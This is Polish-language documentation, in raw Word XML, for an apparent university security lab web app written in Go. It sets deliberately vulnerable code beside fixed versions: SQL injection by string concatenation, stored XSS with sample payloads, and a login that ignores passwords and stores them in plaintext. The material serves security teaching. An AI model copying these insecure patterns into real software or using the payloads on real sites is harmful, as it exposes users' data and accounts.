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GoDocs - dokumentacja kodu projektu BAI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Projekt:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MikuMiku Fan Hub / BAI_1IZ21B_PROJEKT  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Zakres:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aktywny kod Go z katalogu głównego oraz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Generator:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>docs/tools/generate_godocs.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> oparty o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>go/parser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i AST  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Data generowania:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2026-05-30 06:28:08 CEST  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Dokumentacja obejmuje również funkcje nieeksportowane, ponieważ projekt laboratoryjny wymaga opisu pełnego przepływu: router, handlery, serwisy, dostęp do bazy danych, tryb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerable/secure</w:t>
      </w:r>
      <w:r>
        <w:t>, pomocnicze walidatory oraz testy integracyjne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="1" w:name="sec1"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Pliki celowo pominięte</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/views/pages_templ.go - kod generowany przez Templ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="2" w:name="sec2"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Porównanie kodu podatnego i zabezpieczonego</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ten rozdział pokazuje najważniejsze fragmenty implementacji w układzie inżynierskim: ten sam przypadek użycia aplikacji, jego wejścia i wyjścia, wariant podatny oraz wariant zabezpieczony. Listing nie jest oderwanym demo - każdy fragment pochodzi z normalnej funkcjonalności MikuMiku Fan Hub: wyszukiwarki biblioteki, komentarzy, logowania, profilu użytkownika, moderacji, podglądu plików i narzędzia administracyjnego.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="3" w:name="sec3"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.1. SQL Injection w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcjonalność aplikacji:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/search?q=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /ui/library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, wymuszony endpoint testowy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/search-vulnerable?q=...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki źródłowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/service/service.go:164</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/service/service.go:189</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/service/service.go:205</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:765</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wejścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>query string q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z formularza biblioteki lub zapytania HTTP; poprawny przykład: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Miku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; atak: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>zz' UNION SELECT ... FROM users --</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wyjścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON z polem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> albo fragment HTML wyników; w wariancie podatnym błąd SQLite lub wstrzyknięte wiersze mogą trafić do odpowiedzi, w wariancie secure payload jest zwykłym tekstem wyszukiwania.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Co dzieje się wewnątrz:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Handler pobiera </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, przekazuje go do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SearchPosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Serwis sprawdza tryb bezpieczeństwa. W trybie podatnym skleja SQL jako tekst i wykonuje go przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>db.Query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, więc apostrof kończy literał SQL i pozwala dopisać </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lub podzapytanie. W trybie secure budowany jest tylko wzorzec LIKE, a właściwy SQL ma placeholdery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>; sterownik SQLite wiąże wartości jako dane, nie jako składnię.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod podatny: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SearchPostsVulnerable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Post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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// VULNERABLE: direct string concatenation into the SQL statement.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sqlQuery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"SELECT id, title, post_content, published FROM blog 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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"WHERE title LIKE '%"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"%' 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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"OR post_content LIKE '%"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"%'"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rows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sqlQuery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scanPostRows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rows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01" w:name="lst1"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 1. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2001"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod zabezpieczony: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SearchPostsSecure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Post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pattern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"%"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"%"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sqlQuery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"SELECT id, title, post_content, published FROM blog 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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"WHERE published = 1 AND (title LIKE ? OR post_content LIKE ?)"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rows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sqlQuery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pattern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pattern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scanPostRows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rows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02" w:name="lst2"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 2. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2002"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="4" w:name="sec4"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2. Stored XSS w komentarzach pod postami</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcjonalność aplikacji:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /ui/posts/view/:id/comments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /api/comments-vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /api/comments-secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki źródłowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/service/service.go:388</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/service/service.go:413</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:974</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1068</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wejścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>post_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>author</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>body/comment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; poprawny komentarz: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Świetny setlist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; atak: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="..."&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> albo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;script&gt;...&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wyjścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID nowego komentarza albo odświeżona lista komentarzy; podatny wariant przechowuje HTML bez zmian, secure zapisuje treść oczyszczoną i escapowaną.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Co dzieje się wewnątrz:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Warstwa HTTP odczytuje treść z formularza albo JSON. W podatnej ścieżce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CreateCommentVulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zapisuje </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dokładnie tak, jak przyszło od klienta, a widok w insecure mode renderuje komentarze jako HTML. W secure mode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CreateComment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usuwa najbardziej ryzykowne konstrukcje (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, atrybuty zdarzeń, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>javascript:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) i dodatkowo wykonuje </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>html.EscapeString</w:t>
      </w:r>
      <w:r>
        <w:t>, więc payload staje się tekstem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod podatny: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CreateCommentVulnerable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postID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int64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res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Exec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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"INSERT INTO comments (post_id, author, body) VALUES (?, ?, ?)"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postID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E7490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LastInsertId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03" w:name="lst3"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 3. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2003"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod zabezpieczony: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CreateComment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postID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int64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stored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stored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html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EscapeString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stripUnsafeHTML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res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Exec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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"INSERT INTO comments (post_id, author, body) VALUES (?, ?, ?)"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postID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stored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0E7490"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0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LastInsertId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04" w:name="lst4"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 4. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2004"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="5" w:name="sec5"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3. Broken Authentication i zapis haseł</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcjonalność aplikacji:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /ui/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /register</w:t>
      </w:r>
      <w:r>
        <w:t>, seedowanie kont demonstracyjnych</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki źródłowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:170</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:538</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/service/service.go:293</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/service/service.go:321</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/db/db.go:149</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wejścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, opcjonalnie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:t>; poprawny login secure wymaga właściwego hasła, w insecure wystarczy istniejąca nazwa użytkownika.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wyjścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP 200 i ciasteczko sesyjne albo 401/429; dla rejestracji wpis w tabeli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. W secure hasło w bazie jest hashem bcrypt, w insecure kolumna </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> przechowuje sekret jawnie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Co dzieje się wewnątrz:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Handler logowania wywołuje </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>evaluateLogin</w:t>
      </w:r>
      <w:r>
        <w:t>. W vulnerable mode sprawdzane jest tylko istnienie użytkownika (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UserExists</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), więc dowolne hasło działa. W secure mode serwis pobiera hash i używa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bcrypt.CompareHashAndPassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; dodatkowo działa limit prób. Przy tworzeniu użytkownika </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>preparePassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> decyduje, czy zapisać tekst jawny, czy bcrypt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod podatny: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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// VULNERABLE: Broken Authentication - password is ignored.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exists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UserExists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"Database error"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StatusInternalServerError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exists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"User not found"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StatusUnauthorized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fmt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Sprintf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"Login successful for %s"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false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StatusOK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preparePassword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plain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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// VULNERABLE: plaintext storage in password_hash.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plain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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// secure branch omitted in this vulnerable listing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05" w:name="lst5"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 5. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2005"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod zabezpieczony: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&amp;&amp;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CheckRateLimit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"Too many failed attempts. Please wait 60 seconds."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StatusTooManyRequests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valid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ValidateUserCredentials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"Database error"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StatusInternalServerError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valid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RecordLoginFailure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"Invalid username or password"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StatusUnauthorized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ValidateUserCredentials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var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stored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QueryRow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"SELECT password_hash FROM users WHERE username = ?"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Scan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E185D"/>
                <w:sz w:val="17"/>
